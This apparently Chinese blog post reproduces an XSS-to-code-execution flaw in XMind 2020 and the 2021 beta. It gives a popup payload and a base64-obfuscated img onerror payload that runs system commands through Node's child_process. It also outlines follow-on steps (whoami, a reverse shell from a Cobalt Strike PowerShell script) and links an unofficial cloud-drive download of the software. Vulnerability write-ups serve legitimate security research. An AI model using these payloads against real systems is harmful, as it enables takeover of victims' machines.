简介
XMind是一种功能齐全的思维导图和头脑风暴工具,旨在产生想法,激发创造力,并在工作和生活中带来效率。数以百万计的用户们喜欢它
漏洞(xss)
XMind2020及2021beta版本存在xss漏洞导致任意代码执行,可直接拿到目标主机权限
下载
官方连接:
XMind2020链接:https://www.xmind.cn/download/
XMind2021bate链接:https://www.xmind.cn/xmind2021/beta/
XMind2020百度云下载:
链接:https://pan.baidu.com/s/1M_kZ5OhRgxv33OGILZuKYg
提取码:qy4k
漏洞复现
XMind2020 【xss】
payload:<audio src=x onerror=confirm("abai")>
打开XMind2020,选择大纲后将XSS粘贴进去后,按Ctrl键后输入任意字符就可以弹框了
命令执行
payload:<img src=# onerror='eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ2lwY29uZmlnIC9hbGwnLChlcnJvciwgc3Rkb3V0LCBzdGRlcnIpPT57CiAgICBhbGVydChgc3Rkb3V0OiAke3N0ZG91dH1gKTsKICB9KTs=`,`base64`).toString())'>
base64进行编码
执行ipconfig/all
执行whoami
反弹shell
CS生成powershell脚本